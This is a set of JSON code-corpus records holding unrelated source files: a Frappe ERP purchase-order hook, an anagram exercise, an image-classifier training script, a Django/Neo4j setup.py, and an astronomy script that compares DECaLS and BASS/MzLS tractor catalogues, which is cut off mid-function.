+{"seq_id":"11152521582","text":"import frappe, json\n\n@frappe.whitelist()\ndef check_order_tracking(name):\n order_tracking = frappe.db.sql(\"\"\" SELECT COUNT(*) as count FROM `tabOrder Tracking` WHERE purchase_order_ref=%s \"\"\",name, as_dict=1 )\n\n return order_tracking[0].count > 0\n\ndef validate_po(doc, method):\n if len(doc.orders) > 0:\n for i in doc.items:\n if i.qty != i.final_moq:\n frappe.throw(\"Final MOQ (\" + str(i.final_moq) + \") for item \" + i.item_name + \" is not equal to Order Qty (\" + str(i.qty) + \")\")\n\n@frappe.whitelist()\ndef create_order_tracking(doc):\n data = json.loads(doc)\n print(data['orders'])\n\n obj = {\n \"doctype\": \"Order Tracking\",\n \"supplier\": data['supplier'],\n \"purchase_order_ref\": data['name'],\n \"order_tracking_items\": get_order_tracking_items(data),\n \"purchase_order_date\": data['transaction_date'],\n }\n ot = frappe.get_doc(obj).insert()\n return ot.name\n\ndef get_order_tracking_items(doc):\n items = []\n for i in doc['orders']:\n items.append({\n \"order\": i['order'],\n })\n return items\ndef get_order_tracking_location():\n status = [{\n \"status\": \"Waiting\",\n }]\n return status\n\n\ndef on_trash_po(doc, method):\n for i in doc.orders:\n frappe.db.sql(\"\"\" UPDATE `tabOrder` SET purchase_order='' WHERE name=%s \"\"\", (i.order))\n frappe.db.commit()","repo_name":"exvas/grand","sub_path":"grand/doc_events/purchase_order.py","file_name":"purchase_order.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"38614674994","text":"\"\"\"\nQuestion: Anagrams\n\nGiven two strings s and t , write a function to determine if t is an anagram of s.\n\nSample Input 1\ns = \"anagram\", t = \"nagaram\"\nSample Output 1\nTrue\n\nSample Input 2\ns = \"rat\", t = \"car\"\nSample Output 2\nFalse\n\"\"\"\n\n# Time Complexity --> nlogn + mlogm\ndef check_anagram(sentence_1,sentence_2):\n #write your code here\n sentence_1 = (sentence_1.lower()).replace(\" \", \"\")\n sentence_2 = (sentence_2.lower()).replace(\" \", \"\")\n\n if sorted(sentence_1) == sorted(sentence_2):\n return True\n else:\n return False\n \nif __name__ == \"__main__\":\n sentence_1 = \"aabc\"\n sentence_2 = \"abcd\"\n print(check_anagram(sentence_1,sentence_2))\n","repo_name":"Mananjot/100-Day-of-Code","sub_path":"day25.py","file_name":"day25.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"3598966684","text":"from sorter_inceptionV3 import Sorter\nimport argparse\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument(\"train_dir\")\n parser.add_argument(\"validation_dir\")\n parser.add_argument(\"save_weights_path\")\n parser.add_argument(\"--finetuning\", type=str, default=\"\")\n parser.add_argument(\"--gpus\", type=int, default=1)\n args = parser.parse_args()\n classes = [\"hyper\", \"non-hyper\"]\n train_dir = args.train_dir\n validation_dir = args.validation_dir\n\n sorter = Sorter(\n classes=classes,\n train_dir=train_dir,\n validation_dir=validation_dir,\n save_weights_path=args.save_weights_path,\n finetuning_weights_path=args.finetuning,\n img_size=(300, 300),\n n_gpus=args.gpus,\n color_randomize_options={\n 'h': 0.05,\n 's': 0.1,\n 'v': 20,\n },\n ealry_stopping_options={\n 'patience': 10,\n }\n )\n\n # train\n sorter.train()\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"niigata-bioinfo/hypermutation-ai-code","sub_path":"detect_hypermutation/train_hyper.py","file_name":"train_hyper.py","file_ext":"py","file_size_in_byte":1015,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"11627163921","text":"import setuptools\n\nwith open(\"README.md\", \"r\") as fh:\n long_description = fh.read()\n\nsetuptools.setup(\n name=\"neo4j_for_django\",\n version=\"0.0.2\",\n author=\"Lila Rest\",\n author_email=\"mail@lila.rest\",\n description=\"This Python 3.X package provides Neo4j support for the Django framework.\",\n long_description=long_description,\n long_description_content_type=\"text/markdown\",\n url=\"https://github.com/LilaRest/neo4j_for_django\",\n packages=setuptools.find_packages(),\n install_requires=['neo4j'],\n extras_require={\"bcrypt\": [\"bcrypt\"], },\n classifiers=[\n 'Intended Audience :: Developers',\n 'Programming Language :: Python',\n \"Programming Language :: Python :: 3\",\n 'Programming Language :: Python :: 3 :: Only',\n \"License :: OSI Approved :: GNU General Public License v3 (GPLv3)\",\n \"Operating System :: OS Independent\",\n \"Framework :: Django\",\n \"Framework :: Django :: 2.2\",\n \"Natural Language :: English\",\n \"Topic :: Database\",\n ],\n)","repo_name":"LilaRest/neo4j_for_django","sub_path":"src/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"}
+{"seq_id":"71577357374","text":"#!/usr/bin/env python\n\n\"\"\"compare two tractor catalogues that should have same objects\n\"\"\"\n\nfrom __future__ import division, print_function\n\nimport matplotlib\nmatplotlib.use('Agg') #display backend\nimport os\nimport sys\nimport logging\nimport argparse\nimport numpy as np\nfrom scipy import stats as sp_stats\n#import seaborn as sns\n\nimport matplotlib.pyplot as plt\n\nfrom astropy.io import fits\nfrom astropy.table import vstack, Table\nfrom astrometry.libkd.spherematch import match_radec\n\n#import thesis_code.targets as targets\nfrom legacyanalysis import targets \nfrom legacyanalysis.pathnames import get_outdir\n\n\nclass Matched_Cats():\n def __init__(self):\n self.data={}\n def initialize(self,data_1,data_2,m1,m2,m1_unm,m2_unm,d12, deg2_decam,deg2_bokmos):\n self.d12= d12 #deg separations between matches objects\n self.deg2_decam= deg2_decam \n self.deg2_bokmos= deg2_bokmos \n self.data['m_decam']= targets.data_extract(data_1,m1) \n self.data['m_bokmos']= targets.data_extract(data_2,m2)\n self.data['u_decam']= targets.data_extract(data_1,m1_unm)\n self.data['u_bokmos']= targets.data_extract(data_2,m2_unm)\n def add_d12(self,d12):\n '''concatenate new d12 with existing matched deg separation array'''\n self.d12= np.concatenate([self.d12, d12])\n def add_dict(self,match_type,new_data):\n '''match_type -- m_decam,m_bokmos,u_decam, etc\n new data -- data returend from read_from..() to be concatenated with existing m_decam, etc'''\n for key in self.data[match_type].keys(): \n self.data[match_type][key]= np.concatenate([self.data[match_type][key],new_data[key]])\n\ndef deg2_lower_limit(data):\n '''deg2 spanned by objects in each data set, lower limit'''\n ra= data['ra'].max()-data['ra'].min()\n assert(ra > 0.)\n dec= abs(data['dec'].max()-data['dec'].min())\n return ra*dec\n\ndef match_it(cat1,cat2):\n '''cat1,2 are tractor catalogue to match objects between'''\n #match cats\n data_1= targets.read_from_tractor_cat(cat1)\n data_2= targets.read_from_tractor_cat(cat2)\n #deg2 spanned by objects in each data set\n deg2_decam= deg2_lower_limit(data_1)\n deg2_bokmos= deg2_lower_limit(data_2)\n #all the 'all1' objects that have match in 'all2' \n m1, m2, d12 = match_radec(data_1['ra'],data_1['dec'],data_2['ra'],data_2['dec'],\\\n 1.0/3600.0,nearest=True)\n m1_unm = np.delete(np.arange(len(data_1['ra'])),m1,axis=0)\n m2_unm = np.delete(np.arange(len(data_2['ra'])),m2,axis=0)\n return data_1,data_2,m1,m2,m1_unm,m2_unm,d12, deg2_decam,deg2_bokmos\n\ndef read_lines(fn):\n fin=open(fn,'r')\n lines=fin.readlines()\n fin.close()\n return list(np.char.strip(lines))\n\n#plotting vars\nlaba=dict(fontweight='bold',fontsize='medium')\nkwargs_axtext=dict(fontweight='bold',fontsize='large',va='top',ha='left')\nleg_args=dict(frameon=True,fontsize='x-small')\n\ndef plot_nobs(b):\n '''make histograms of nobs so can compare depths of g,r,z between the two catalogues''' \n hi=0 \n for cam in ['m_decam','m_bokmos']:\n for band in 'grz':\n hi= np.max((hi, b[cam].data[band+'_nobs'].max()))\n bins= hi\n for cam in ['m_decam','m_bokmos']:\n for band in 'grz':\n junk=plt.hist(b[cam].data[band+'_nobs'],bins=bins,normed=True,cumulative=True,align='mid')\n xlab=plt.xlabel('nobs %s' % band, **laba)\n ylab=plt.ylabel('CDF', **laba)\n plt.savefig(os.path.join(get_outdir('bmd'),'hist_nobs_%s_%s.png' % (band,cam[2:])), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\n#def plot_nobs_2(b):\n# '''improved version of plot_nobs'''\n# for cam in ['m_decam','m_bokmos']:\n# for band in 'grz':\n# junk=plt.hist(b[cam].data[band+'_nobs'],bins=10,normed=True,cumulative=True,align='mid')\n# xlab=plt.xlabel('nobs %s' % band, **laba)\n# ylab=plt.xlabel('CDF', **laba)\n# plt.savefig(os.path.join(get_outdir('bmd'),'hist_nobs_%s_%s.png' % (band,cam[2:])), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n# plt.close()\n#\n#\n# c1= 'b' \n# c2= 'r'\n# ###\n# decam_max= [b['m_decam'].data[b+'_nobs'].max() for b in 'grz']\n# bokmos_max= [b['m_bokmos'].data[b+'_nobs'].max() for b in 'grz']\n# types= np.arange(1, np.max((decam_max,bokmos_max)) +1)\n# ind = types.copy() # the x locations for the groups\n# width = 1 # the width of the bars\n# ###\n# ht_decam, ht_bokmos= np.zeros(5,dtype=int),np.zeros(5,dtype=int)\n# for cnt,typ in enumerate(types):\n# ht_decam[cnt]= np.where(obj[m_types[0]].data['type'] == typ)[0].shape[0] / float(obj['deg2_decam'])\n# ht_bokmos[cnt]= np.where(obj[m_types[1]].data['type'] == typ)[0].shape[0] / float(obj['deg2_bokmos'])\n# ###\n# fig, ax = plt.subplots()\n# rects1 = ax.bar(ind, ht_decam, width, color=c1)\n# rects2 = ax.bar(ind + width, ht_bokmos, width, color=c2)\n# ylab= ax.set_ylabel(\"counts/deg2\")\n# if matched: ti= ax.set_title('Matched')\n# else: ti= ax.set_title('Unmatched')\n# ax.set_xticks(ind + width)\n# ax.set_xticklabels(types)\n# ax.legend((rects1[0], rects2[0]), ('decam', 'bokmos'),**leg_args)\n# #save\n# if matched: name='hist_types_Matched.png'\n# else: name='hist_types_Unmatched.png'\n# plt.savefig(os.path.join(get_outdir('bmd'),name), bbox_extra_artists=[ylab,ti], bbox_inches='tight',dpi=150)\n# plt.close()\n#\n\ndef plot_radec(obj, addname=''): \n '''obj[m_types] -- DECaLS() objects with matched OR unmatched indices'''\n #set seaborn panel styles\n #sns.set_style('ticks',{\"axes.facecolor\": \".97\"})\n #sns.set_palette('colorblind')\n #setup plot\n fig,ax=plt.subplots(1,2,figsize=(9,6),sharey=True,sharex=True)\n plt.subplots_adjust(wspace=0.25)\n #plt.subplots_adjust(wspace=0.5)\n #plot\n ax[0].scatter(obj['m_decam'].data['ra'], obj['m_decam'].data['dec'], \\\n edgecolor='b',c='none',lw=1.)\n ax[1].scatter(obj['u_decam'].data['ra'], obj['u_decam'].data['dec'], \\\n edgecolor='b',c='none',lw=1.,label='DECaLS')\n ax[1].scatter(obj['u_bokmos'].data['ra'], obj['u_bokmos'].data['dec'], \\\n edgecolor='g',c='none',lw=1.,label='BASS/MzLS')\n for cnt,ti in zip(range(2),['Matched','Unmatched']):\n ti=ax[cnt].set_title(ti,**laba)\n xlab=ax[cnt].set_xlabel('RA', **laba)\n ylab=ax[0].set_ylabel('DEC', **laba)\n ax[0].legend(loc='upper left',**leg_args)\n #save\n #sns.despine()\n plt.savefig(os.path.join(get_outdir('bmd'),'radec%s.png' % addname), bbox_extra_artists=[xlab,ylab,ti], bbox_inches='tight',dpi=150)\n plt.close()\n\n\ndef plot_HistTypes(obj,m_types=['m_decam','m_bokmos'], addname=''):\n '''decam,bokmos -- DECaLS() objects with matched OR unmatched indices'''\n #matched or unmatched objects\n if m_types[0].startswith('m_') and m_types[1].startswith('m_'): matched=True\n elif m_types[0].startswith('u_') and m_types[1].startswith('u_'): matched=False \n else: raise ValueError\n #sns.set_style(\"whitegrid\")\n #sns.set_palette('colorblind')\n #c1=sns.color_palette()[2] \n #c2=sns.color_palette()[0] #'b'\n c1= 'b' \n c2= 'r'\n ###\n types= ['PSF','SIMP','EXP','DEV','COMP']\n ind = np.arange(len(types)) # the x locations for the groups\n width = 0.35 # the width of the bars\n ###\n ht_decam, ht_bokmos= np.zeros(5,dtype=int),np.zeros(5,dtype=int)\n for cnt,typ in enumerate(types):\n ht_decam[cnt]= np.where(obj[m_types[0]].data['type'] == typ)[0].shape[0] / float(obj['deg2_decam'])\n ht_bokmos[cnt]= np.where(obj[m_types[1]].data['type'] == typ)[0].shape[0] / float(obj['deg2_bokmos'])\n ###\n fig, ax = plt.subplots()\n rects1 = ax.bar(ind, ht_decam, width, color=c1)\n rects2 = ax.bar(ind + width, ht_bokmos, width, color=c2)\n ylab= ax.set_ylabel(\"counts/deg2\")\n if matched: ti= ax.set_title('Matched')\n else: ti= ax.set_title('Unmatched')\n ax.set_xticks(ind + width)\n ax.set_xticklabels(types)\n ax.legend((rects1[0], rects2[0]), ('DECaLS', 'BASS/MzLS'),**leg_args)\n #save\n if matched: name='hist_types_Matched%s.png' % addname\n else: name='hist_types_Unmatched%s.png' % addname\n plt.savefig(os.path.join(get_outdir('bmd'),name), bbox_extra_artists=[ylab,ti], bbox_inches='tight',dpi=150)\n plt.close()\n\n\ndef bin_up(data_bin_by,data_for_percentile, bin_edges=np.arange(20.,26.,0.25)):\n '''finds indices for 0.25 bins, returns bin centers and q25,50,75 percentiles of data_percentile in each bin\n bin_edges: compute percentiles for each sample between bin_edges\n '''\n count= np.zeros(len(bin_edges)-1)+np.nan\n q25,q50,q75= count.copy(),count.copy(),count.copy()\n for i,low,hi in zip(range(len(count)), bin_edges[:-1],bin_edges[1:]):\n ind= np.all((low <= data_bin_by,data_bin_by < hi),axis=0)\n if np.where(ind)[0].size > 0:\n count[i]= np.where(ind)[0].size\n q25[i]= np.percentile(data_for_percentile[ind],q=25)\n q50[i]= np.percentile(data_for_percentile[ind],q=50)\n q75[i]= np.percentile(data_for_percentile[ind],q=75)\n else:\n pass #given qs nan, which they already have\n return (bin_edges[1:]+bin_edges[:-1])/2.,count,q25,q50,q75\n\ndef indices_for_type(obj,inst='m_decam',type='all'):\n '''return mask for selecting type == all,psf,lrg\n data -- obj['m_decam'].data\n lrg mask -- obje['m_decam'].lrg'''\n if type == 'all': \n return np.ones(obj[inst].data['type'].size, dtype=bool) #1 = True\n elif type == 'psf': \n return obj[inst].data['type'] == 'PSF'\n elif type == 'lrg': \n return obj[inst].lrg\n else: raise ValueError\n\n\ndef plot_SN_vs_mag(obj, found_by='matched',type='all', addname=''):\n '''obj['m_decam'] is DECaLS() object\n found_by -- 'matched' or 'unmatched' \n type -- all,psf,lrg'''\n #indices for type == all,psf, or lrg\n assert(found_by == 'matched' or found_by == 'unmatched')\n prefix= found_by[0]+'_' # m_ or u_\n index={}\n for key in ['decam','bokmos']:\n index[key]= indices_for_type(obj,inst=prefix+key,type=type)\n #bin up SN values\n min,max= 18.,25.\n bin_SN=dict(decam={},bokmos={})\n for key in bin_SN.keys():\n for band in ['g','r','z']:\n bin_SN[key][band]={}\n i= index[key]\n bin_edges= np.linspace(min,max,num=30)\n bin_SN[key][band]['binc'],count,bin_SN[key][band]['q25'],bin_SN[key][band]['q50'],bin_SN[key][band]['q75']=\\\n bin_up(obj[prefix+key].data[band+'mag'][i], \\\n obj[prefix+key].data[band+'flux'][i]*np.sqrt(obj[prefix+key].data[band+'flux_ivar'][i]),\\\n bin_edges=bin_edges)\n #setup plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n #plot SN\n for cnt,band in zip(range(3),['g','r','z']):\n #horiz line at SN = 5\n ax[cnt].plot([1,40],[5,5],'k--',lw=2)\n #data\n for inst,color,lab in zip(['decam','bokmos'],['b','g'],['DECaLS','BASS/MzLS']):\n ax[cnt].plot(bin_SN[inst][band]['binc'], bin_SN[inst][band]['q50'],c=color,ls='-',lw=2,label=lab)\n ax[cnt].fill_between(bin_SN[inst][band]['binc'],bin_SN[inst][band]['q25'],bin_SN[inst][band]['q75'],color=color,alpha=0.25)\n #labels\n ax[2].legend(loc=1,**leg_args)\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].set_yscale('log')\n xlab=ax[cnt].set_xlabel('%s' % band, **laba)\n ax[cnt].set_ylim(1,100)\n ax[cnt].set_xlim(20.,26.)\n ylab=ax[0].set_ylabel('S/N', **laba)\n text_args= dict(verticalalignment='bottom',horizontalalignment='right',fontsize=10)\n ax[2].text(26,5,'S/N = 5 ',**text_args)\n plt.savefig(os.path.join(get_outdir('bmd'),'sn_%s_%s%s.png' % (found_by,type,addname)), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\ndef plot_matched_dmag_vs_psf_fwhm(obj, type='psf'):\n '''using matched sample, plot diff in mags vs. DECAM psf_fwhm in bins \n obj['m_decam'] is DECaLS() object'''\n #indices\n index= np.all((indices_for_type(b,inst='m_decam',type=type),\\\n indices_for_type(b,inst='m_bokmos',type=type)), axis=0) #both bokmos and decam of same type\n #bin up by DECAM psf_fwhm\n bin_edges= np.linspace(0,3,num=6)\n vals={}\n for band in ['g','r','z']:\n vals[band]={}\n vals[band]['binc'],count,vals[band]['q25'],vals[band]['q50'],vals[band]['q75']=\\\n bin_up(obj['m_decam'].data[band+'_psf_fwhm'][index], \\\n obj['m_bokmos'].data[band+'mag'][index]- obj['m_decam'].data[band+'mag'][index], \\\n bin_edges=bin_edges)\n#setup plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n text_args= dict(verticalalignment='center',horizontalalignment='left',fontsize=10)\n #plot\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].plot(vals[band]['binc'], vals[band]['q50'],c='b',ls='-',lw=2)\n ax[cnt].fill_between(vals[band]['binc'],vals[band]['q25'],vals[band]['q75'],color='b',alpha=0.25)\n ax[cnt].text(0.05,0.95,band,transform=ax[cnt].transAxes,**text_args)\n #finish\n xlab=ax[1].set_xlabel('decam PSF_FWHM', **laba)\n ylab=ax[0].set_ylabel(r'Median $\\Delta \\, m$ (decam - bokmos)', **laba)\n ti= plt.suptitle('%s Objects, Matched' % type.upper())\n plt.savefig(os.path.join(get_outdir('bmd'),'dmag_vs_psf_fwhm_%s.png' % type), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\ndef plot_matched_decam_vs_bokmos_psf_fwhm(obj, type='psf'):\n '''using matched sample, plot decam psf_fwhm vs. bokmos psf_fwhm \n obj['m_decam'] is DECaLS() object'''\n #indices\n index= np.all((indices_for_type(b,inst='m_decam',type=type),\\\n indices_for_type(b,inst='m_bokmos',type=type)), axis=0) #both bokmos and decam of same type\n #setup plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n text_args= dict(verticalalignment='center',horizontalalignment='left',fontsize=10)\n #plot\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].scatter(obj['m_bokmos'].data[band+'_psf_fwhm'][index], obj['m_decam'].data[band+'_psf_fwhm'][index],\\\n edgecolor='b',c='none',lw=1.)\n ax[cnt].text(0.05,0.95,band,transform=ax[cnt].transAxes,**text_args)\n #finish\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].set_xlim(0,3)\n ax[cnt].set_ylim(0,3)\n xlab=ax[1].set_xlabel('PSF_FWHM (bokmos)', **laba)\n ylab=ax[0].set_ylabel('PSF_FWHM (decam)', **laba)\n ti= plt.suptitle('%s Objects, Matched' % type.upper())\n plt.savefig(os.path.join(get_outdir('bmd'),'decam_vs_bokmos_psf_fwhm_%s.png' % type), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\n\n\ndef plot_confusion_matrix(cm,ticknames, addname=''):\n '''cm -- NxN array containing the Confusion Matrix values\n ticknames -- list of strings of length == N, column and row names for cm plot'''\n plt.imshow(cm, interpolation='nearest', cmap=plt.cm.Blues,vmin=0,vmax=1)\n cbar=plt.colorbar()\n plt.xticks(range(len(ticknames)), ticknames)\n plt.yticks(range(len(ticknames)), ticknames)\n ylab=plt.ylabel('True (DECaLS)')\n xlab=plt.xlabel('Predicted (BASS/MzLS)')\n for row in range(len(ticknames)):\n for col in range(len(ticknames)):\n if np.isnan(cm[row,col]):\n plt.text(col,row,'n/a',va='center',ha='center')\n elif cm[row,col] > 0.5:\n plt.text(col,row,'%.2f' % cm[row,col],va='center',ha='center',color='yellow')\n else:\n plt.text(col,row,'%.2f' % cm[row,col],va='center',ha='center',color='black')\n plt.savefig(os.path.join(get_outdir('bmd'),'confusion_matrix%s.png' % addname), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\ndef create_confusion_matrix(obj):\n '''compares MATCHED decam (truth) to bokmos (prediction)\n return 5x5 confusion matrix and colum/row names\n obj[m_decam'] is DECaLS object'''\n cm=np.zeros((5,5))-1\n types=['PSF','SIMP','EXP','DEV','COMP']\n for i_dec,dec_type in enumerate(types):\n ind= np.where(obj['m_decam'].data['type'] == dec_type)[0]\n for i_bass,bass_type in enumerate(types):\n n_bass= np.where(obj['m_bokmos'].data['type'][ind] == bass_type)[0].size\n if ind.size > 0: cm[i_dec,i_bass]= float(n_bass)/ind.size #ind.size is constant for each loop over bass_types\n else: cm[i_dec,i_bass]= np.nan\n return cm,types\n\ndef plot_matched_separation_hist(d12):\n '''d12 is array of distances in degress between matched objects'''\n #pixscale to convert d12 into N pixels\n pixscale=dict(decam=0.25,bokmos=0.45)\n #sns.set_style('ticks',{\"axes.facecolor\": \".97\"})\n #sns.set_palette('colorblind')\n #setup plot\n fig,ax=plt.subplots()\n #plot\n ax.hist(d12*3600,bins=50,color='b',align='mid')\n ax2 = ax.twiny()\n ax2.hist(d12*3600./pixscale['bokmos'],bins=50,color='g',align='mid',visible=False)\n xlab= ax.set_xlabel(\"arcsec\")\n xlab= ax2.set_xlabel(\"pixels [BASS]\")\n ylab= ax.set_ylabel(\"Matched\")\n #save\n #sns.despine()\n plt.savefig(os.path.join(get_outdir('bmd'),\"separation_hist.png\"), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\ndef plot_psf_hists(decam,bokmos, zoom=False):\n '''decam,bokmos are DECaLS() objects matched to decam ra,dec'''\n #divide into samples of 0.25 mag bins, store q50 of each\n width=0.25 #in mag\n low_vals= np.arange(20.,26.,width)\n med={}\n for b in ['g','r','z']: med[b]=np.zeros(low_vals.size)-100\n for i,low in enumerate(low_vals):\n for band in ['g','r','z']:\n ind= np.all((low <= decam[band+'mag'],decam[band+'mag'] < low+width),axis=0)\n if np.where(ind)[0].size > 0:\n med[band][i]= np.percentile(bokmos[band+'mag'][ind] - decam[band+'mag'][ind],q=50)\n else: \n med[band][i]= np.nan\n #make plot\n #set seaborn panel styles\n #sns.set_style('ticks',{\"axes.facecolor\": \".97\"})\n #sns.set_palette('colorblind')\n #setup plot\n fig,ax=plt.subplots(1,3,figsize=(9,3)) #,sharey=True)\n plt.subplots_adjust(wspace=0.5)\n #plot\n for cnt,band in zip(range(3),['r','g','z']):\n ax[cnt].scatter(low_vals, med[band],\\\n edgecolor='b',c='none',lw=2.) #,label=m_type.split('_')[-1])\n xlab=ax[cnt].set_xlabel('bins of %s (decam)' % band, **laba)\n ylab=ax[cnt].set_ylabel('q50[%s bokmos - decam]' % band, **laba)\n if zoom: ax[cnt].set_ylim(-0.25,0.25)\n # sup=plt.suptitle('decam with matching bokmos',**laba)\n #save\n #sns.despine()\n if zoom: name=\"median_color_diff_zoom.png\"\n else: name=\"median_color_diff.png\"\n plt.savefig(os.path.join(get_outdir('bmd'),name), bbox_extra_artists=[xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n\n##########\n#funcs for flux diff / sqrt(inv var + inv var)\ndef n_gt_3_sigma(sample, low=-8.,hi=8.):\n '''for a sample that should be distributed as N(mean=0,stddev=1), returns mask for the N that are greater 3 sigma\n low,hi -- minimum and maximum sample values that will be considered'''\n i_left= np.all((sample >= low,sample <= -3.),axis=0)\n i_right= np.all((sample <= hi,sample>=3),axis=0)\n #assert i_left and i_right are mutually exclusive\n false_arr= np.all((i_left,i_right),axis=0) #should be array of Falses\n assert( np.all(false_arr == False) ) #should be np.all([True,True,...]) which evaluates to True\n return np.any((i_left,i_right),axis=0)\n\ndef gauss_stats(n_samples=10000):\n '''returns mean,std,q25, frac outliers > 3 sigma for n_samples drawn from unit gaussian N(0,1)'''\n G= sp_stats.norm(0,1)\n mean=std=q25=perc_out=0.\n for i in range(10): #draw 10 times, take avg of the 10 measurements of each statistic\n draws= G.rvs(n_samples) \n mean+= np.mean(draws)\n std+= np.std(draws)\n q25+= np.percentile(draws,q=25)\n perc_out+= 2*G.cdf(-3)*100 #HACH same number ea time\n mean/= 10.\n std/= 10.\n q25/= 10.\n perc_out/= 10.\n tol=1e-1\n assert(abs(mean) <= tol)\n assert(abs(std-1.) <= tol)\n return mean,std,q25,perc_out\n\ndef sample_gauss_stats(sample, low=-20,hi=20):\n '''return dictionary of stats about the data and stats for a sample that is unit gaussian distributed\n low,hi -- minimum and maximum sample values that will be considered'''\n a=dict(sample={},gauss={})\n #vals for unit gaussian distributed data\n a['gauss']['mean'],a['gauss']['std'],a['gauss']['q25'],a['gauss']['perc_out']= gauss_stats(n_samples=sample.size)\n #vals for actual sample\n a['sample']['mean'],a['sample']['std'],a['sample']['q25'],a['sample']['q75']= \\\n np.mean(sample),np.std(sample),np.percentile(sample,q=25),np.percentile(sample,q=75) \n i_outliers= n_gt_3_sigma(sample, low=low,hi=hi)\n a['sample']['perc_out']= sample[i_outliers].size/float(sample.size)*100.\n return a\n\n\ntext_args= dict(verticalalignment='center',fontsize=8)\ndef plot_dflux_chisq(b,type='psf', low=-8.,hi=8.,addname=''):\n #join indices b/c matched\n i_type= np.all((indices_for_type(b, inst='m_decam',type=type),\\\n indices_for_type(b, inst='m_bokmos',type=type)), axis=0) #both bokmos and decam of same type\n #get flux diff for each band\n hist= dict(g=0,r=0,z=0)\n binc= dict(g=0,r=0,z=0)\n stats=dict(g=0,r=0,z=0)\n #chi \n sample,mag={},{}\n for band in ['g','r','z']:\n sample[band]= (b['m_decam'].data[band+'flux'][i_type]-b['m_bokmos'].data[band+'flux'][i_type])/np.sqrt(\\\n np.power(b['m_decam'].data[band+'flux_ivar'][i_type],-1)+np.power(b['m_bokmos'].data[band+'flux_ivar'][i_type],-1))\n mag[band]= 22.5-2.5*np.log10(b['m_decam'].data[band+'flux'][i_type])\n #loop over mag bins, one 3 panel for each mag bin\n for b_low,b_hi in zip([18,19,20,21,22,23],[19,20,21,22,23,24]):\n #plot each filter\n for band in ['g','r','z']:\n imag= np.all((b_low <= mag[band],mag[band] < b_hi),axis=0)\n #print(\"len(imag)=\",len(imag),\"len(sample)=\",len(sample),\"len(sample[imag])=\",len(sample[imag]))\n hist[band],bins,junk= plt.hist(sample[band][imag],range=(low,hi),bins=50,normed=True)\n db= (bins[1:]-bins[:-1])/2\n binc[band]= bins[:-1]+db\n plt.close() #b/c plt.hist above\n #for drawing unit gaussian N(0,1)\n G= sp_stats.norm(0,1)\n xvals= np.linspace(low,hi)\n #plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n for cnt,band in zip(range(3),['g','r','z']):\n ax[cnt].step(binc[band],hist[band], where='mid',c='b',lw=2)\n ax[cnt].plot(xvals,G.pdf(xvals))\n #labels\n for cnt,band in zip(range(3),['g','r','z']):\n if band == 'r': xlab=ax[cnt].set_xlabel(r'%s $(F_{d}-F_{bm})/\\sqrt{\\sigma^2_{d}+\\sigma^2_{bm}}$' % band, **laba)\n else: xlab=ax[cnt].set_xlabel('%s' % band, **laba)\n #xlab=ax[cnt].set_xlabel('%s' % band, **laba)\n ax[cnt].set_ylim(0,0.6)\n ax[cnt].set_xlim(low,hi)\n ylab=ax[0].set_ylabel('PDF', **laba)\n ti=ax[1].set_title(\"%s (%.1f <= %s < %.1f)\" % (type,b_low,band,b_hi),**laba)\n #put stats in suptitle\n plt.savefig(os.path.join(get_outdir('bmd'),'dflux_chisq_%s_%.1f-%s-%.1f%s.png' % (type,b_low,band,b_hi,addname)), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n plt.close()\n################\n\ndef plot_magRatio_vs_mag(b,type='psf',addname=''):\n #join indices b/c matched\n i_type= np.all((indices_for_type(b, inst='m_decam',type=type),\\\n indices_for_type(b, inst='m_bokmos',type=type)), axis=0) #both bokmos and decam of same type\n #plot\n fig,ax=plt.subplots(1,3,figsize=(9,3),sharey=True)\n plt.subplots_adjust(wspace=0.25)\n for cnt,band in zip(range(3),['g','r','z']):\n magRatio= np.log10(b['m_bokmos'].data[band+'flux'][i_type])/np.log10(b['m_decam'].data[band+'flux'][i_type]) -1.\n mag= 22.5-2.5*np.log10(b['m_decam'].data[band+'flux'][i_type])\n ax[cnt].scatter(mag,magRatio, c='b',edgecolor='b',s=5) #,c='none',lw=2.)\n #labels\n for cnt,band in zip(range(3),['g','r','z']):\n xlab=ax[cnt].set_xlabel('%s AB' % band, **laba)\n ax[cnt].set_ylim(-0.5,0.5)\n ax[cnt].set_xlim(18,26)\n ylab=ax[0].set_ylabel(r'$m_{bm}/m_d - 1$', **laba)\n ti=ax[1].set_title(\"%s\" % type,**laba)\n #put stats in suptitle\n plt.savefig(os.path.join(get_outdir('bmd'),'magRatio_vs_mag_%s%s.png' % (type,addname)), bbox_extra_artists=[ti,xlab,ylab], bbox_inches='tight',dpi=150)\n 